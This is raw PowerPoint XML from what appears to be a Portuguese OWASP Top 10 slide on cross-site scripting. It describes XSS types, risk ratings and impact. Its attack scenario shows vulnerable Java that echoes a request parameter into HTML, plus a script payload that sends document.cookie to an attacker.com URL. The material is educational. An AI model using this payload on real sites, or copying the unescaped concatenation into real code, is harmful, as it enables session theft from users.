Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Injection_Flaws" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XXE" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/564.html"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owasp.org/index.php/Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/384.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Authentication_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_authentication" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Session_fixation" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Session_Management_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticato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6858000" cy="9144000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39821798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5" name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82907838"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="955675"/>
          <a:ext cx="6858000" cy="2629069"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="591989">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gridSpan="2">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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>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r>
              <a:tr h="43204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000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico da </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicaçã</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>o</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="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pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploração </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MÉDIA</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0"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914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Prevalência</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MUITO DIFUNDIDA</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FF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detecção</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FÁCIL</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0"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pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Impacto</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERADO</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0"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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico do Negócio/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicação</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="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488429">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considere alguém que possa enviar dados não-confiáveis</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> para o sistema, incluindo usuários externos, usuários internos, e administradores.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="800" noProof="0" dirty="0" smtClean="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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Os atacantes enviam ataques de script baseado em texto que exploram o interpretador no navegador.  Quase qualquer fonte de dados pode ser um vetor de ataque, incluindo fontes internas como dados do banco de dados.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" dirty="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indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" u="none" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> é a mais predominante falha de segurança em aplicações web. As falhas de XSS ocorrem quando uma aplicação inclui os dados fornecidos pelo usuário na</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>página, enviados ao navegador, sem a validação ou filtro apropriados desse conteúdo.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Existem três tipos conhecidos de falhas XSS: 1)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>P</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>ersistente</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, 2) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Refletido</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, e 3) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>XSS baseado em DOM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>A detecção da maioria das falhas XSS é bastante fácil via testes ou análise de código. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="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marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Atacantes podem executar scripts no navegador da vítima para sequestrar sessões do usuário, desfigurar web sites, inserir conteúdo hostil,  redirecionar usuários, seqüestrar o navegador  usando malware, etc.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considere o valor do negócio do sistema afetado e todos os dados que processa. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Também considere o impacto no</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>negócio da</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>exposição pública da vulnerabilidade.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6400800"/>
            <a:ext cx="3382963" cy="27432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lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemplo de Cenário de Ataque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A aplicação utiliza dados não-confiáveis na construção do seguinte fragmento HTML sem validação ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filtro:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (String) page += "&lt;input name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' type='TEXT‘</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("CC") + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>O atacante modifica o parâmetro 'CC' em seu navegador para:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;script&gt;document.location=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.attacker.com/cgi-bin/cookie.cgi?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  foo=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+document.cookie&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Isso causa o envio do ID de sessão da vítima para o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>do atacante, permitindo que o atacante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sequestre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a sessão atual do usuário.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
